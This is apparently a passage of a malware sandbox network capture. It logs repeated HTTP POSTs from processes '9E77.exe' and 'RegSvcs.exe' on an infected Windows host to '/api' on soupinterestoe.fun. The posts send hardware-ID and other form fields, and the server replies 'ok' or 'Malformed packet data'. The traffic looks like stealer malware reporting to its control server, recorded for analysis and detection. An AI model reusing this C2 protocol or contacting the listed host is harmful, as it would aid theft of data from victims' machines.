Dec 27, 2023 18:13:17.155553102 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 3828 Host: soupinterestoe.fun
Dec 27, 2023 18:13:17.155623913 CET	3828	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:17.545896053 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=bm21creclght5loi6gfk4qket8; expires=Sun, 21-Apr-2024 10:59:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qMbdjfudR0ghtx0bP7Zn8zNbHg1iztjI84nPfnBIXK0Rh13VzPii68kBB2JyFK4npws7cut9HAEw44lxb6H2FRRUwbJQdqlJ%2B35IddZhVaoohvL0kfWQFbMElNVukmVM08m54JA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3317a9d9d6b9 Data Raw: Data Ascii:
Dec 27, 2023 18:13:17.545907021 CET	28	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: -DFWfok 212.102.41.2
Dec 27, 2023 18:13:17.545916080 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49814	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:17.294888020 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:17.295166016 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:17.683634043 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=gbt7gebahi724s46ql69mgkcfg; expires=Sun, 21-Apr-2024 10:59:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TdKYO1dSaCTKvzhZ3Iar%2FJQ1FF6pTCHDscxsrpWC2au%2Bi59oWz3zATsVD1vo3rhlPskORs%2BtEtsAk%2FGQdLrtKvX6firjlLnfcHFetgwS4iEloJYcMFNdqfJuHEU%2BCTi7nPQBCSU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3317 Data Raw: Data Ascii:
Dec 27, 2023 18:13:17.683646917 CET	43	IN	Data Raw: 37 64 34 35 32 65 37 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 7d452e72-DFW15Malformed packet data
Dec 27, 2023 18:13:17.683707952 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49816	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:17.746074915 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:17.746153116 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:18.269850969 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=2ljqd4h427d99vhbbi9ur21acq; expires=Sun, 21-Apr-2024 10:59:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Js%2Fdi%2BGdVpay8dDE8V8e0CMe%2BcZ7LDrmlgrEKxwtWFJ2QRxAUMa3RCPwts7uljlA2Roh8kaatDBzMA3xFItGvLrqHmEM5b9l5H%2BEFuN%2Bo%2Boejo5wV2U%2BPZZlrOdBSWIRsQtZhWI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 18:13:18.269862890 CET	47	IN	Data Raw: 33 31 37 65 34 64 37 62 33 34 36 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 317e4d7b3461-DFW15Malformed packet data
Dec 27, 2023 18:13:18.269907951 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49817	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:18.430331945 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:18.430392981 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:18.993396997 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=bfs9h6u8ptepf16m9enpskbg5r; expires=Sun, 21-Apr-2024 10:59:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6IbBNerkoWUGyQPRm2r%2FwrhmUQh5%2BAQU3NDTmOtGsc08M7fGME1Qt9Q0QjWCrsWLK9OHOR6mEzJ%2BS4iFuQx3Vz3Zo7oj0OIikYQioW5uvstbEr36%2FaJ7FyFG%2B6jh0ypAzkofVek%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3318 Data Raw: Data Ascii:
Dec 27, 2023 18:13:18.993408918 CET	43	IN	Data Raw: 39 39 36 66 33 35 38 61 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 996f358a-DFW15Malformed packet data
Dec 27, 2023 18:13:18.993418932 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49818	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:19.503525019 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:19.503570080 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:19.893688917 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=7q44le2s62b4tc69th8rr91c7l; expires=Sun, 21-Apr-2024 10:59:58 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:19 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:19 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:19 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cBj8jbJIOVu2Yk5RhYPj53uu8hAqkuNGY2M448zEUHYdK3j4ZBO0nnKAYETVqL7XEo9JjdbAdpBUJRjIi4yCV0KDtD%2BlqqdFLVT6%2BOXn7KcYYOMJo%2FlMI5B4zXpUFFotu%2B3kwig%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331894 Data Raw: Data Ascii:
Dec 27, 2023 18:13:19.893701077 CET	41	IN	Data Raw: 33 65 36 63 34 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3e6c46-DFW15Malformed packet data
Dec 27, 2023 18:13:19.893711090 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49819	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:21.230200052 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:21.230253935 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:21.611723900 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=84c51b0uv7n4dhh39s6j7e5qqn; expires=Sun, 21-Apr-2024 11:00:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PO%2BeY01X021BloObjORaPFKy01ZCiRzkrZtv4rwnbgsEsJ7ZkqI3QW1wwW6iybUyKNWOWTt42WpG2XLymhO6DCg05P1Fp%2BpBZFoSX9rE6wzPsANFmcAi7jywZZ9MGoF98l2fLEY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331941aef6 Data Raw: Data Ascii:
Dec 27, 2023 18:13:21.611736059 CET	37	IN	Data Raw: 62 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: b3-DFW15Malformed packet data
Dec 27, 2023 18:13:21.611768007 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49820	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:22.092693090 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:22.092788935 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:22.472134113 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=jn2jmggk58dnitq0crku5akgii; expires=Sun, 21-Apr-2024 11:00:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8b5lTOpGFwAFgTRKAmVL%2BZjy1t1Cla8D1w4wQWpvqMzKsjGzwOeofpEVChK%2BFnhr2J1yjuzgdvlDTXB472BDMDml8m9bLSLXZ5lh3pu8rItXNju6KdoUTTQzw9ibApWhZigzQKc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331997a386 Data Raw: Data Ascii:
Dec 27, 2023 18:13:22.472146988 CET	37	IN	Data Raw: 34 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 46-DFW15Malformed packet data
Dec 27, 2023 18:13:22.472193003 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49821	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:22.749999046 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:22.750056982 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:23.133128881 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=r9htervgbumo12iqjlvpubpoe1; expires=Sun, 21-Apr-2024 11:00:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CMW036fEUE95z%2BFXQuVBSI4zJEwXhYQnXd77PENri9ikpQObYilBpNIOPChV%2Ba9oia4Y41b2B2GSYMxXBWcXxpIRcKj9DN1rKRYGtp3vwflKgEIW1owHWcqZX69GUXay5i%2BHLUw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3319d9e9 Data Raw: Data Ascii:
Dec 27, 2023 18:13:23.133141994 CET	39	IN	Data Raw: 36 62 64 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6bdd-DFW15Malformed packet data
Dec 27, 2023 18:13:23.133152962 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49822	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:23.614985943 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 841 Host: soupinterestoe.fun
Dec 27, 2023 18:13:23.615035057 CET	841	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
